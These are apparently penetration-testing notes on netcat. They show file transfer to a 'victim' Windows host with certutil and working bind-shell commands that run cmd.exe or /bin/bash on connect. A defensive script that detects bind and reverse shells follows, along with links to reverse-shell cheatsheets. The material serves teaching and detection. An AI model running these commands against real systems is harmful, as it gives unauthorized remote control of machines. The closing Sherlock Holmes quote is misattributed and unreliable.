# Bind & Reverse Shells

## Netcat Fundamentals

* Netcat (aka the TCP/IP Swiss Army Knife) is a networking utility used to read and write data over network connections using TCP or UDP.
* Netcat is available for both \*NIX and Windows operating systems, consequently making it extremely useful for cross-platform engagements.
* Netcat utilizes a client-server communication architecture with two modes:
  * Client mode - Netcat can be used in client mode to connect to any TCP/UDP port as well as a Netcat listener (server).
  * Server mode - Netcat can be used to listen for connections from clients on a specific port.
* Netcat can be used by penetration testers to perform the following functionality:
  * Banner Grabbing
  * Port Scanning
  * Transferring Files
  * Bind/Reverse Shells

## **Usage of Netcat**

The `/usr/share/windows-binaries` folder contains various Windows executables on Kali Linux. These files can be transferred to a victim's machine for exploitation.

### Transferring Files from Kali Linux to Windows

#### **Using Python HTTP Server and Certutil**

1. **Prepare Files:**
   * Locate Windows executables in "/usr/share/windows-binaries" on Kali Linux.
2. **Host File on Python Server:**
   * Start a Python HTTP server:

     ```bash
     python3 -m http.server
     ```
   * Files can now be accessed via `http://<your_ip>:8000/<filename>`.
3. **Download on Windows Using Certutil:**
   * On the victim's Windows machine:

     ```bash
     certutil -urlcache -f http://<your_ip>:8000/<filename> <file_name_to_save>
     ```

#### **Using Netcat (nc) for Direct Transfer**

1. **Setup Netcat on Windows:**
   * Receive files using Netcat:

     ```bash
     nc.exe -nvlp 1234 > <output-file-name>
     ```
2. **Send File from Kali Linux:**
   * Send file from Kali Linux to Windows:

     ```bash
     nc -nv <win_ip> 1234 < <file-to-share>
     ```
   * Replace `<win_ip>` with the Windows machine's IP address. Neither side exits on its own once the data has been sent; when the output file stops growing, stop the connection with Ctrl+C and compare a checksum of the file on both ends to confirm the copy is complete.

## Bind Shells

* A bind shell is a type of remote shell where the attacker connects directly to a listener on the target system, allowing execution of commands on the target. Because the listening port must be reachable from outside, a bind shell fails when inbound traffic to the target is filtered by a firewall or NAT.
* A Netcat listener can be set up to execute a specific program, such as cmd.exe or /bin/bash, when a client connects to it.

<figure><img src="/files/Dww4ZvR5wWv3KVLkurmz" alt=""><figcaption><p>Bind Shells</p></figcaption></figure>

## Setting Up Bind Shells

### **Windows System**

* **Establish Bind Shell:**

  ```bash
  nc.exe -nvlp 1234 -e cmd.exe
  ```

  This command starts a Netcat listener (`-l`) on port 1234 (`-p 1234`), skipping DNS resolution (`-n`) and printing verbose output (`-v`), and executes (`-e`) `cmd.exe` when a client connects, creating a bind shell.
* **Connect from Linux:**

  ```bash
  nc -nv <win_ip> <port>
  ```

  Replace `<win_ip>` with the IP address of the Windows machine hosting the bind shell, and `<port>` with the port number (1234 in this example).

### **Linux System**

* **Establish Bind Shell:**

  ```bash
  nc -nvlp 1234 -c /bin/bash
  ```

  This command sets up a Netcat listener (`-l`) on port 1234 (`-p 1234`), skipping DNS resolution (`-n`) and printing verbose output (`-v`), and executes (`-c`) `/bin/bash` when a client connects, creating a bind shell. Only netcat builds with exec support accept `-c`/`-e` (netcat-traditional, which Kali uses, and ncat); the OpenBSD netcat installed by default on Debian and Ubuntu has neither option.
* **Connect from Windows:**

  ```bash
  nc.exe -nv <linux_ip> <port>
  ```

  Replace `<linux_ip>` with the IP address of the Linux machine hosting the bind shell, and `<port>` with the port number (1234 in this example).

## Reverse Shells

* A reverse shell is a type of remote shell where the target connects back to a listener on the attacker's system, allowing execution of commands on the target system. Because the connection is outbound from the target, it works even when inbound connections to the target are blocked, which is why reverse shells are used far more often than bind shells.

<figure><img src="/files/OswJ6orZCTPSndJFXC2F" alt=""><figcaption><p>Reverse Shells</p></figcaption></figure>
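From the defender's side, the two shell types above leave distinct traces on the target: a bind shell is a netcat process that both listens and execs a program, and a reverse shell on Linux leaves an interactive shell as the direct owner of an established TCP socket. The script below is an added example, not part of the original notes, that flags both patterns in `ps -eo pid,args` and `ss -tnp` style output; all sample lines, PIDs and addresses are constructed, and it also covers ncat's long-option spellings (`--listen`, `--exec`, `--sh-exec`), which the notes do not show.

```python
"""Flag netcat bind-shell listeners and shell-owned reverse connections (added example)."""
import re

NC_NAMES = {"nc", "nc.exe", "ncat", "netcat", "nc.traditional"}
SHELL_NAMES = {"bash", "sh", "dash", "zsh", "cmd.exe", "powershell.exe"}
SS_PROC = re.compile(r'\("(?P<name>[^"]+)",pid=(?P<pid>\d+),fd=\d+\)')

def find_bind_shells(ps_lines):
    """PIDs of netcat processes that listen (-l/--listen) AND exec a program on
    connect (-e/-c/--exec/--sh-exec): the bind-shell pattern from the notes."""
    hits = []
    for line in ps_lines:
        pid, _, args = line.strip().partition(" ")
        argv = args.split()
        if not pid.isdigit() or not argv or argv[0].rsplit("/", 1)[-1] not in NC_NAMES:
            continue
        short = "".join(a[1:] for a in argv[1:] if a.startswith("-") and not a.startswith("--"))
        longs = {a for a in argv[1:] if a.startswith("--")}
        if ("l" in short or "--listen" in longs) and (set("ec") & set(short) or longs & {"--exec", "--sh-exec"}):
            hits.append(int(pid))
    return hits

def find_reverse_shells(ss_lines):
    """(pid, shell, peer) for ESTAB sockets owned directly by a shell. On Linux,
    netcat's -e/-c dup2()s the socket onto the shell's stdio, so the shell (not
    nc) owns the socket; a shell holding a TCP socket is never normal."""
    hits = []
    for line in ss_lines:
        f = line.split()
        if len(f) < 6 or f[0] != "ESTAB":
            continue
        for m in SS_PROC.finditer(f[5]):
            if m["name"] in SHELL_NAMES:
                hits.append((int(m["pid"]), m["name"], f[4]))
    return hits

PS_SAMPLE = [  # constructed `ps -eo pid,args` output
    "  PID COMMAND",
    "  412 /usr/sbin/sshd -D",
    " 2231 nc -nvlp 1234 -c /bin/bash",           # bind shell from this page
    " 2290 nc -nv 10.0.0.9 1234",                  # plain client (file transfer): benign
    " 2301 ncat --listen 4444 --sh-exec /bin/sh",  # same thing, ncat spelling
]
SS_SAMPLE = [  # constructed `ss -tnp` output
    "State Recv-Q Send-Q Local Address:Port Peer Address:Port Process",
    'ESTAB 0 0 10.0.0.5:22 10.0.0.9:50122 users:(("sshd",pid=412,fd=4))',
    'ESTAB 0 0 10.0.0.5:49152 10.0.0.9:4444 users:(("bash",pid=2410,fd=3))',
    'LISTEN 0 1 0.0.0.0:1234 0.0.0.0:* users:(("nc",pid=2231,fd=3))',
]
```

On the samples, `find_bind_shells(PS_SAMPLE)` returns `[2231, 2301]` and `find_reverse_shells(SS_SAMPLE)` returns `[(2410, 'bash', '10.0.0.9:4444')]`; the plain `nc` client and the listener socket owned by `nc` itself are not flagged.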

### Reverse Shell Cheatsheet

* [Reverse Shell Generator](https://www.revshells.com/)
* [Reverse Shell Cheatsheet - PayloadsAllTheThings](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md)

***

**Hacker's Mantra:** "Humiliation is the favorite currency of the hacker." - Sherlock Holmes

